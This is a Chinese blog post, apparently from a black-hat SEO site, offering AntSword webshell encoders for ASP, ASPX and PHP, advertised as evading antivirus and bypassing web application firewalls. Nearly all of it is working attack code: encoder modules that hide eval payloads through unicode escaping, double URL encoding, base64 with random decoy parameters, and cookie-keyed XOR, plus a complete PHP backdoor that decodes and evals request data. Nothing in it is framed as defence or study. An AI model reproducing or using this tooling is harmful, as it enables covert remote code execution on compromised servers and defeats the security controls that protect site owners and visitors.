富贵长生天做主由不得我
钢骨正气我做主由不得天

ASP/ASPX/PHP蚁剑编码器,超级免杀,过WAF

ASP

第一款

‘use strict’;
function char2unicode(c) {
  if(c.length != 1) {
    return ”;
  }
  let buff = Buffer.alloc(4, ‘0’);
  let hexstr = c.charCodeAt().toString(16);
  buff.write(hexstr, buff.length – hexstr.length, hexstr.length);
  return “\\u” + buff.toString();
}
function string2unicode(str){
    var ret = “”;
    for(var i=0; i<str.length; i++){
        ret += char2unicode(str[i]);
    }
    return ret;
}
module.exports = (pwd, data, ext={}) => {
  data[pwd] = string2unicode(data[‘_’]).replace(/\\u/g, ‘asunescape(%)u’);
  // 删除 _ 原有的payload
  delete data[‘_’];
  // 返回编码器处理后的 payload 数组
  return data;
}
————————————————————————————————————————————————————
第二款 alwaf
‘use strict’;
/*
code by Mr6
*/
module.exports = (pwd, data, ext = {}) => {
  let varname_min = 5;
  let varname_max = 15;
  let data_min = 200;
  let data_max = 250;
  let num_min = 100;
  let num_max = 200;
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = Buffer.from(data[‘_’]).toString(‘base64’);
  function randomString(length) {
    //let chars=’0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’;
    let chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ’;
    let result = ”;
    for (let i = length; i > 0; –i) result += chars[Math.floor(Math.random() * chars.length)];
    return result;
  }
  function randomInt(min, max) {
    return parseInt(Math.random() * (max – min + 1) + min, 10);
  }
  for (let i = 0; i < randomInt(num_min, num_max); i++) {
    data[randomString(randomInt(varname_min, varname_max))] = randomString(randomInt(data_min, data_max));
  }
  data[pwd] = `@eval(base64_decode($_POST[${randomID}]));`;
  delete data[‘_’];
  return data;
}
————————————————————————————————————————————————————
第三款
/**
 * asp::url_bypass 编码器
 * 双重url编码
 * author: mr6
 * <%execute(unescape(request("mr6")))%>
 */
'use strict';
module.exports = (pwd, data) => {
    function str2url(str) {
        var ret = "";
        for (var i = 0; i < str.length; i++) {
          ret += "%"+str[i].charCodeAt().toString(16);
        }
        return ret;
      }

    data[pwd] = `asunescape(${str2url(str2url(data['_']))})`;
    delete data['_'];
    return data;
}
------------------------------------------------------------------------------------------------------------------------------------------------------------
aspx
//
// aspx::base64_bypass 编码模块
// 把所有参数都进行base64编码
// author:mr6

‘use strict’;

module.exports = (pwd, data, ext = null) => {
let randomID;
if (ext.opts.otherConf[‘use-random-variable’] === 1) {
randomID = antSword.utils.RandomChoice(antSword[‘RANDOMWORDS’]);
} else {
randomID = `${antSword[‘utils’].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
}
data[randomID] = Buffer
.from(data[‘_’])
.toString(‘base64’);
data[pwd] = Buffer.from(`eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item[“${randomID}”])),”unsafe”);`).toString(‘base64’);
delete data[‘_’];
return data;
}
————————————————————————————————————————————————————
php

专用马

<?php
class Cookie
{
function __construct()
{
$key=@$_COOKIE[‘PHPSESSID’];
@$post=base64_decode($_REQUEST[‘test’]);
for($i=0;$i<strlen($post);$i++){
$post[$i] = $post[$i] ^ $key[$i%26];
}
return $post;
}
function __destruct()
{return @eval($this->__construct());}
}
$check=new Cookie();
?>

编码器[pwd_protected_post key=’保护密码’]您需要选择一个短代码[/pwd_protected_post]

‘use strict’;
//code by yzddmr6

module.exports = (pwd, data, ext = {}) => {
let randomID = `x${Math.random().toString(16).substr(2)}`;

function xor(payload) {
let crypto = require(‘crypto’);
let key = crypto.createHash(‘md5’).update(randomID).digest(‘hex’).substr(6);
ext.opts.httpConf.headers[‘Cookie’] = ‘PHPSESSID=’ + key;
key = key.split(“”).map(t => t.charCodeAt(0));
//let payload=”phpinfo();”;
let cipher = payload.split(“”).map(t => t.charCodeAt(0));
for (let i = 0; i < cipher.length; i++) {
cipher[i] = cipher[i] ^ key[i % 26]
}
cipher = cipher.map(t => String.fromCharCode(t)).join(“”)
cipher = Buffer.from(cipher).toString(‘base64’);
//console.log(cipher)
return cipher;
}

data[‘_’] = Buffer.from(data[‘_’]).toString(‘base64’);
data[pwd] = `eval(base64_decode(“${data[‘_’]}”));`;
data[pwd]=xor(data[pwd]);
delete data[‘_’];

return data;
}

————————————————————————————————————————————————————

赞(0)
未经允许不得转载:网站快照劫持代码-快照删除-黑帽SEO » ASP/ASPX/PHP蚁剑编码器,超级免杀,过WAF

评论 抢沙发

6 + 4 =
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址